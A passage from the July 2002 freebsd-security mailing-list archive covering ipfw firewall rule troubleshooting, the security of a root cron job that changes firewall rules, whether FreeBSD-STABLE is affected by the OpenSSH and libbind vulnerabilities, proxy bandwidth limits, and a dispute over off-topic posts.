> > > # make dynamic entries for all outgoing traffic
> > > add 500 allow log tcp from me to any 1-65535 keep-state out
> > > add 550 allow log udp from me to any 1-65535 keep-state out
> > >
> > > # services we offer to the world
> > > add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in
> > >
> > > # pass ICMP
> > > add 700 allow log icmp from me to any out
> > > add 750 allow log icmp from any to me in
> > >
> > > # pass everything on private LAN
> > > add 800 allow log all from 192.168.0.0/16 to any
> > > add 850 allow log all from any to 192.168.0.0/16
> > >
> > > # log rejects that have fallen through
> > > add 65000 deny log ip from any to any
> > >
> > > With this ruleset I can browse websites, FTP sites etc.
> > >
> > > But when I replace rules 500 and 550 with this:
> > >
> > > add 500 allow log tcp from me to any 21,80 keep-state out
> > > add 550 allow log udp from me to any 21,80 keep-state out
> > >
> > > I cannot access any websites nor FTP sites. But I guess I had just allowed
> > > it?
> > >
> > > Or is the 'out' the problem here.
> > >
> > > Marcel.
> > >
> > > On Monday 01 July 2002 06:45 pm, nascar24 wrote:
> > > > What I mean is that I want to grant access to the internet. But only to
> > > > ports I 'trust', like 80,21,22 etc. But when I make a rule like:
> > > >
> > > > add 550 allow ip from me to any 80,21,22
> > > >
> > > > I cannot access a website, that puzzles me.
> > >
> > > There is a problem with the rule in the example: You allowed traffic to
> > > leave
> > > through those ports, but not to enter. We can fix this rule:
> > >
> > > add 550 allow tcp from me to any 80,21,22 keep-state
> > >
> > > I noticed you already had a rule 550 - you may want to give it a different
> > > number. IPFW (running 4.5R here) gives the following error when trying to
> > > load your rule:
> > >
> > > ipfw: only TCP and UDP protocols are valid with port specifications
> > >
> > > hence why i changed it from ip to tcp.
> > >
> > > GL
> >
> > --
> > ----------
> > Ramsey G. Brenner
> > rgbrenner@myrealbox.com
> > http://rgbrenner.cjb.net/

From owner-freebsd-security Tue Jul 2 17:59:19 2002
From: "Kim Okasawa"
To: freebsd-security@FreeBSD.ORG
Subject: Any security issues with root's cron job?
Date: Wed, 03 Jul 2002 09:59:15 +0900 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 03 Jul 2002 00:59:16.0152 (UTC) FILETIME=[DA9E7B80:01C2222C] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Dear all,

I want to set up a cron job to run a script (Perl or shell). The script will be read/write/exec by root only (i.e. 700 or -rwx------). It will run /sbin/ipfw periodically to change rules according to need.

Can anyone think of any potential security risks to such practice? Any suggestions and comments are greatly appreciated. Thank you!

Best Regards,
Kim Okasawa

_________________________________________________________________
Join the world's largest e-mail service with MSN Hotmail. http://www.hotmail.com

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Jul 2 18: 3:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3ED2637B400 for ; Tue, 2 Jul 2002 18:03:51 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id C1F9743E0A for ; Tue, 2 Jul 2002 18:03:50 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 55615534A; Wed, 3 Jul 2002 03:03:47 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: "Peter Brezny" Cc: Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: From: Dag-Erling Smorgrav Date: 03 Jul 2002 03:03:46 +0200 In-Reply-To: Message-ID: Lines: 24 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Peter Brezny" writes: > I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE > FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the > problem listed in CA-2002-18 from CERT. > > it doesn't appear so since it's running Openssh_2.9 and > http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable. I don't know how many times I have to say this: FreeBSD-STABLE's version of OpenSSH is not vulnerable. Anyone who tells you otherwise is lying or misinformed. The OpenBSD advisory is (quite possibly intentionally) misleading. It lists FreeBSD as vulnerable becaue FreeBSD-CURRENT was, for about three months (late March to late June 2002). Note that by the standards OpenBSD apply to their own software, FreeBSD is not and was never vulnerable, because no FreeBSD release ever shipped with a vulnerable version of OpenSSH. 
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18: 9:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E60FC37B400 for ; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 84C3E43E09 for ; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.4/8.12.3) with ESMTP id g6319UT4008966; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.4/8.12.3/Submit) id g6319Ufb008965; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) (envelope-from dillon) Date: Tue, 2 Jul 2002 18:09:30 -0700 (PDT) From: Matthew Dillon Message-Id: <200207030109.g6319Ufb008965@apollo.backplane.com> To: Dag-Erling Smorgrav Cc: "Peter Brezny" , Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Since were on the subject of vulnerabilities, I am massively confused over the reported BIND/NAMED vulnerability. My question is simple: Is the named in -stable currently vulnerable or has it been fixed? I know the port is fixed. What about the named sitting in -stable? 
Thanks, -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18:18:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 944BF37B400 for ; Tue, 2 Jul 2002 18:18:31 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 045E943E4A for ; Tue, 2 Jul 2002 18:18:31 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id E74E7534D; Wed, 3 Jul 2002 03:18:28 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Matthew Dillon Cc: "Peter Brezny" , Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: <200207030109.g6319Ufb008965@apollo.backplane.com> From: Dag-Erling Smorgrav Date: 03 Jul 2002 03:18:28 +0200 In-Reply-To: <200207030109.g6319Ufb008965@apollo.backplane.com> Message-ID: Lines: 12 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matthew Dillon writes: > My question is simple: Is the named in -stable currently vulnerable or > has it been fixed? I know the port is fixed. What about the named > sitting in -stable? As far as I know, named itself is not vulnerable, but libbind contains the bug, and software that uses libbind's gethost*() (nothing in the base system does) is vulnerable. 
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18:24:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 28B7037B400 for ; Tue, 2 Jul 2002 18:24:24 -0700 (PDT) Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id B36A143E0A for ; Tue, 2 Jul 2002 18:24:23 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 17PYsY-0003Qz-00 for freebsd-security@FreeBSD.ORG; Tue, 02 Jul 2002 21:24:22 -0400 Date: Tue, 2 Jul 2002 21:24:22 -0400 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Message-ID: <20020703012422.GC9314@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <200207030109.g6319Ufb008965@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.27i X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav probably said: > As far as I know, named itself is not vulnerable, but libbind contains > the bug, and software that uses libbind's gethost*() (nothing in the > base system does) is vulnerable. Does -STABLE's /usr/bin/dig, host, etc, not use libbind, then ? strings on the binary suggests otherwise. 
\pir -- pir pir-sig@pir.net pir-sig@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18:43:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E8E7637B400 for ; Tue, 2 Jul 2002 18:43:32 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 728F143E0A for ; Tue, 2 Jul 2002 18:43:32 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 1CC3A534A; Wed, 3 Jul 2002 03:43:30 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: freebsd-security@freebsd.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: <200207030109.g6319Ufb008965@apollo.backplane.com> <20020703012422.GC9314@pir.net> From: Dag-Erling Smorgrav Date: 03 Jul 2002 03:43:29 +0200 In-Reply-To: <20020703012422.GC9314@pir.net> Message-ID: Lines: 14 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Peter Radcliffe writes: > Dag-Erling Smorgrav probably said: > > As far as I know, named itself is not vulnerable, but libbind contains > > the bug, and software that uses libbind's gethost*() (nothing in the > > base system does) is vulnerable. > Does -STABLE's /usr/bin/dig, host, etc, not use libbind, then ? They don't use the parts of libbind that contain the bug. 
They use low-level functions that return raw DNS records rather than just host names or IP addresses. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 19: 8:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2A02437B400 for ; Tue, 2 Jul 2002 19:08:38 -0700 (PDT) Received: from gatotkaca.mweb.net.id (gatotkaca.mweb.net.id [202.53.234.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 697B643E09 for ; Tue, 2 Jul 2002 19:08:36 -0700 (PDT) (envelope-from ruspeni@mti.ee.itb.ac.id) Received: from asep (unknown [202.153.233.17]) by gatotkaca.mweb.net.id (Postfix) with SMTP id 084FC784B2 for ; Wed, 3 Jul 2002 09:07:39 +0700 (JAVT) (envelope-from ruspeni@mti.ee.itb.ac.id) Message-ID: <004301c22237$53670000$21020a0a@mti.ee.itb.ac.id> From: "Asep Ruspeni" To: References: Subject: limiting proxy access Date: Wed, 3 Jul 2002 09:14:12 +0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i am using freebsd as gateway for internet connection in my office. these are my configurations : - proxy (squid) using port 8080 - dhcp server and natd - ipfw for firewall i use netstat to monitor which computer accessing proxy. sometimes manually deny ip/tcp computer which consume much bandwidth than others using ipfw and restarting squid daemon. (eg. 
using download accelerator plus which support proxy could consume great amount bandwidth available) my question : is there any script i could use, to maintain bandwidth limitation so it will automatically stop/limit bandwidth consuming without restarting squid daemon. thank you in advance. best regards. -asep- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 19:21:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D0C1937B400 for ; Tue, 2 Jul 2002 19:21:47 -0700 (PDT) Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7841943E31 for ; Tue, 2 Jul 2002 19:21:47 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 17PZm6-0003lz-00 for freebsd-security@freebsd.org; Tue, 02 Jul 2002 22:21:46 -0400 Date: Tue, 2 Jul 2002 22:21:46 -0400 From: Peter Radcliffe To: freebsd-security@freebsd.org Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Message-ID: <20020703022146.GE9314@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@freebsd.org References: <200207030109.g6319Ufb008965@apollo.backplane.com> <20020703012422.GC9314@pir.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.27i X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav probably said: > They don't use the parts of libbind that contain the bug. They use > low-level functions that return raw DNS records rather than just host > names or IP addresses. 
and since libbind.a is isn't installed as part of the base OS, just by the port, most people should be ok. Thanks, P. -- pir pir-sig@pir.net pir-sig@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 21:30:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F3B937B400 for ; Tue, 2 Jul 2002 21:30:36 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7AFF843E3D for ; Tue, 2 Jul 2002 21:30:35 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id WAA28451; Tue, 2 Jul 2002 22:30:20 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020702222843.00cf1610@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 02 Jul 2002 22:30:15 -0600 To: Chris BeHanna , FreeBSD Security From: Brett Glass Subject: Re: security fixes In-Reply-To: <20020702191848.O13868-100000@topperwein.dyndns.org> References: <20020702230034.1316.qmail@web10104.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:25 PM 7/2/2002, Chris BeHanna wrote: > OK, then. Ante up, say, $7000 apiece to get two people working on >this full-time, and you might get 4.6.1 in six weeks. Nonsense. If there's a consensus that it should be done (and one is growing), then it will be done. Without delaying any releases scheduled for four months hence. 
--Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 23:50:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3B3C737B400 for ; Tue, 2 Jul 2002 23:50:39 -0700 (PDT) Received: from smtp.pekinnet.net (smtp.pk.gallatinriver.net [64.40.75.24]) by mx1.FreeBSD.org (Postfix) with ESMTP id B94A143E0A for ; Tue, 2 Jul 2002 23:50:38 -0700 (PDT) (envelope-from freebsdlists@elitists.org) Received: from [192.168.1.10] (unknown [64.40.88.202]) by smtp.pekinnet.net (Postfix) with ESMTP id A5EF16A209 for ; Wed, 3 Jul 2002 02:41:17 -0400 (EDT) User-Agent: Microsoft-Entourage/10.0.0.1309 Date: Wed, 03 Jul 2002 01:50:35 -0500 Subject: Re: Low-volume list From: "F. Even" To: Message-ID: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org No...as has been suggested, take it to "chat" or "questions" or anyplace else. This is getting rather old. You in particular keep regurgitating the same crap that has been covered time and again. I don't object to the workarounds, etc. either being discussed...but can we leave it at that?! Your tirades about what you believe to be ethical or not belong on a different list. Nobody cares. We want straight security info and ways to deal w/ the problems at hand, and I would say about 50% of the list in the last couple of weeks has been anything but that (including this very reply). TAKE IT TO ANOTHER LIST NOW and let us get back ON TOPIC already!!!!! 
(...and now Brett's reply will be something along the lines of "this is on-topic, Theo was of course right, and the FreeBSD team is most unethical, and it is not my fault that I can't comprehend some of the straight-forward responses to most of my issues, and my refusal to accept the responses, blah, blah, blah, blah, blah, blah...and now I need to post about 10 other messages to this...but hopefully I will eventually realize it is futile and there are other people that might actually have a point for once, and maybe I can just once suck it up and realize I am in the wrong here and allow the list to be put back on topic and take the discussion which it being in and of itself a large discussion makes it off-topic, to a list that is more appropriate for a discussion). ENOUGH already. Get ON TOPIC! Rare posting posted by, Frank On 7/1/02 11:59 PM, "security-digest" wrote: > Date: Mon, 01 Jul 2002 21:11:38 -0600 > From: Brett Glass > Subject: Low-volume list > > This isn't the first time that people have asked for a low-volume FreeBSD > security list with announcements only. But discussions of security are > important, too, and there should be a place for them! So, perhaps this > list should be split into two: "security-announce" (moderated) and > "security" (unmoderated). 
> > - --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 1: 4:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 18EA937B400 for ; Wed, 3 Jul 2002 01:04:16 -0700 (PDT) Received: from crc-polska.com (main.crc-polska.com [62.148.92.235]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4919F43E31 for ; Wed, 3 Jul 2002 01:04:14 -0700 (PDT) (envelope-from sebastian.krolak@crc-polska.com) Received: from (IT1) [192.168.1.216] (helo=IT1) by crc-polska.com with esmtp (Exim 3.22 #1) for freebsd-security@FreeBSD.ORG id 17Pf01-0006QE-00; Wed, 03 Jul 2002 09:56:29 +0200 From: =?iso-8859-2?Q?Sebastian_Kr=F3lak?= To: Subject: subscribe Date: Wed, 3 Jul 2002 10:05:46 +0200 Message-ID: <000201c22268$6f7c3770$d801a8c0@kopernik.local> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0003_01C22279.33050770" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0003_01C22279.33050770 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable =20 =20 Pozdrawiam Sebastian Kr=F3lak Administrator sieci CRC CommunicAID Sp. z o.o. tel. (22) 7162760 w. 121 fax (22) 7162767 kom. +48 609 023 393 Sebastian.Krolak@crc-polska.com http://www.crc-polska.com =20 =20 =20 ------=_NextPart_000_0003_01C22279.33050770 Content-Type: text/html; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable
------=_NextPart_000_0003_01C22279.33050770--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Jul 3 1:53:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 94B1F37B400 for ; Wed, 3 Jul 2002 01:53:52 -0700 (PDT) Received: from south.nanolink.com (south.nanolink.com [217.75.134.10]) by mx1.FreeBSD.org (Postfix) with SMTP id 1122143E52 for ; Wed, 3 Jul 2002 01:53:50 -0700 (PDT) (envelope-from roam@ringlet.net) Received: (qmail 5356 invoked by uid 85); 3 Jul 2002 09:06:08 -0000 Received: from unknown (HELO straylight.ringlet.net) (212.116.140.125) by south.nanolink.com with SMTP; 3 Jul 2002 09:06:05 -0000 Received: (qmail 21742 invoked by uid 1000); 3 Jul 2002 08:52:19 -0000 Date: Wed, 3 Jul 2002 11:52:19 +0300 From: Peter Pentchev To: Kim Okasawa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Any security issues with root's cron job? Message-ID: <20020703085219.GC384@straylight.oblivion.bg> Mail-Followup-To: Kim Okasawa , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WYTEVAkct0FjGQmd" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.1i X-Virus-Scanned: by Nik's Monitoring Daemon (AMaViS perl-11d ) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --WYTEVAkct0FjGQmd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Wed, Jul 03, 2002 at 09:59:15AM +0900, Kim Okasawa wrote:
>
> Dear all,
>
> I want to set up a cron job to run a script (Perl or shell). The script
> will be read/write/exec by root only (i.e. 700 or -rwx------). It will run
> /sbin/ipfw periodically to change rules according to need.
>
> Can anyone think of any potential security risks to such practice? Any
> suggestions and comments are greatly appreciated. Thank you!

I can see no problem with that as far as you described it; any potential problems would crawl out of the 'according to need' part. You'd better be damn sure that no one but specially-authorized-sysadmin-processes can indicate 'need'.

Other than that, no, there is no problem with root cron jobs per se, as long as you are careful :)

G'luck,
Peter

--
Peter Pentchev roam@ringlet.net roam@FreeBSD.org
PGP key: http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
This sentence no verb.

--WYTEVAkct0FjGQmd Content-Type: application/pgp-signature Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iD8DBQE9IrtD7Ri2jRYZRVMRAscIAKDEP+67h/qtHSYkTfgq1uZKrjXBvwCgiYey
P7Khp20hbpWY2FVO1ppjPX4=
=zeFj
-----END PGP SIGNATURE-----
--WYTEVAkct0FjGQmd--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Jul 3 7:53:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A29A937B400 for ; Wed, 3 Jul 2002 07:53:27 -0700 (PDT) Received: from r4k.net (r4k.net [212.26.197.210]) by mx1.FreeBSD.org (Postfix) with ESMTP id 15FC843E09 for ; Wed, 3 Jul 2002 07:53:27 -0700 (PDT) (envelope-from _@shell.r4k.net) Received: from shell.r4k.net (localhost [127.0.0.1]) by r4k.net (Postfix) with ESMTP id C573223031; Wed, 3 Jul 2002 16:53:25 +0200 (CEST) Received: (from _@localhost) by shell.r4k.net (8.12.4/8.12.2/Submit) id g63ErJ5s036592; Wed, 3 Jul 2002 16:53:19 +0200 (CEST) Date: Wed, 3 Jul 2002 16:53:19 +0200 From: Stephanie Wehner <_@r4k.net> To: Peter Pentchev Cc:
freebsd-security@FreeBSD.ORG Subject: Re: Any security issues with root's cron job? Message-ID: <20020703145319.GB14710@r4k.net> References: <20020703085219.GC384@straylight.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020703085219.GC384@straylight.oblivion.bg> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi Peter,

> > I want to set up a cron job to run a script (Perl or shell). The script
> > will be read/write/exec by root only (i.e. 700 or -rwx------). It will run
> > /sbin/ipfw periodically to change rules according to need.
> >
> > Can anyone think of any potential security risks to such practice? Any
> > suggestions and comments are greatly appreciated. Thank you!
>
> I can see no problem with that as far as you described it; any potential
> problems would crawl out of the 'according to need' part. You'd better
> be damn sure that no one but specially-authorized-sysadmin-processes can
> indicate 'need'.
>
> Other than that, no, there is no problem with root cron jobs per se, as
> long as you are careful :)

hmja, however in this case I'd also be interested in how this system obtains its timing information. eg if the ipfw rules are set by a cronjob and the machine is remotely updated from an ntp server for example, anyone controlling the ntp server could in effect toggle your firewall rules. I guess this is also somewhat contained in this 'according to need' part.

bye,
Stephanie

--<> _@r4k.net <>------------------<> FreeBSD <>-------------------
#3 - Anime Law of Sonic Amplification, First Law of Anime Acoustics
In space, loud sounds, like explosions, are even louder because there is no air to get in the way.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 3 8:18: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D677D37B400 for ; Wed, 3 Jul 2002 08:18:04 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0B3A043E09 for ; Wed, 3 Jul 2002 08:18:03 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id JAA03329; Wed, 3 Jul 2002 09:17:22 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020703091546.02377ac0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 03 Jul 2002 09:17:14 -0600 To: "F. Even" , From: Brett Glass Subject: Re: Low-volume list In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:50 AM 7/3/2002, F. Even wrote: >No...as has been suggested, take it to "chat" or "questions" or anyplace >else. This is getting rather 